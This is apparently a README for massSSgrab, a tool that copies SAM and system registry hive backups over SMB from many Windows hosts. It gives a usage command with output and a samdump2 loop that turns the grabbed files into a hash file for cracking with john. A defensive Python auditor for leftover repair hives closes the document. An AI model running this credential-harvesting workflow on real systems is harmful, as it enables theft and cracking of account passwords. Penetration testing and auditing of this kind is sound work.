
This tool uses the included JCIFS library to grab copies of both the system and SAM files from the “C:\windows\repair\” directory on multiple hosts.

Key features

A large-scale SAM and system grabber for the /repair/ directory. It can be useful in those corner cases where live capture of the SAM and system files is not possible but you would still like to get historic hashes out of the system.

Installation

No installation needed, just download and run.

Usage and example

$ java -jar massSSgrab.jar --h=/tmp/ips.txt --u=Administrator --p=Password1 --d=WORKSTATION --o=/tmp/SS --verbose --sam=sam --system=system
 [+] Verbose mode ON
         [+]Will grab SAM/System from : 192.168.56.101
         [+]Running mass SAM/System grab agains : 192.168.56.101
                 [+] 192.168.56.101 :
                         [+] SAM file exists
                         [+] System file exists
                         [+] SAM file saved in /tmp/SS/192.168.56.101/SAM_dump
                         [+] System file saved in /tmp/SS/192.168.56.101/System_dump

At the end of the run you will have an output directory containing one subdirectory per IP address, and each of them holds two files: sam and system. To extract the hashes from them, you can use the following command to turn all the files into a single ‘crackable’ hash file and use it as input for ‘john’ (provided that you use samdump2 for it):

$ for ip in $(ls /tmp/SS/); do cd /tmp/SS/$ip && samdump2 SAM_dump System_dump; done > /tmp/hashes_from_repair

Options

--help - Display this help
--verbose - Be verbose
--h - Host List (IP's in text file)
--u - Username
--p - Password
--d - Domain
--o - Output Directory
--sam - name of the SAM file (default sam)
--system - name of the SYSTEM file (default system)
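
For the defensive side of the same corner case, the sketch below (an added example, not part of massSSgrab or the original page) audits a Windows directory, for instance on a mounted image or backup, for leftover repair copies of the SAM and system hives and reads each hive's last-written timestamp from its regf header, which tells you whether account passwords have been rotated since the copy was made. The function names and the example path are assumptions.

```python
import os
import struct
import sys
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def find_ci(parent, name):
    """Case-insensitive child lookup; mounted NTFS volumes keep original case."""
    try:
        for entry in os.listdir(parent):
            if entry.lower() == name.lower():
                return os.path.join(parent, entry)
    except OSError:
        pass  # missing or unreadable directory: treat as "not found"
    return None

def hive_last_written(path):
    """Return the hive's last-written time (UTC), or None if it is not a registry hive."""
    with open(path, "rb") as fh:
        header = fh.read(20)
    if len(header) < 20 or header[:4] != b"regf":
        return None
    # Offset 12 of the regf header: FILETIME, 100 ns ticks since 1601-01-01 UTC.
    (ticks,) = struct.unpack_from("<Q", header, 12)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)

def audit_repair(windows_dir):
    """Map 'sam'/'system' to last-written time for hive copies in <windows_dir>/repair."""
    found = {}
    repair = find_ci(windows_dir, "repair")
    if repair is None:
        return found
    for name in ("sam", "system"):
        path = find_ci(repair, name)
        if path and os.path.isfile(path):
            written = hive_last_written(path)
            if written is not None:
                found[name] = written
    return found

if __name__ == "__main__":
    # Example path is an assumption: a Windows directory from a mounted image.
    target = sys.argv[1] if len(sys.argv) > 1 else "/mnt/image/WINDOWS"
    now = datetime.now(timezone.utc)
    for hive, written in sorted(audit_repair(target).items()):
        print(f"{target}: repair copy of {hive} last written "
              f"{written:%Y-%m-%d} ({(now - written).days} days ago)")
```

Any copy it reports is worth removing or restricting, and any account whose password has not changed since the reported date should be rotated.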
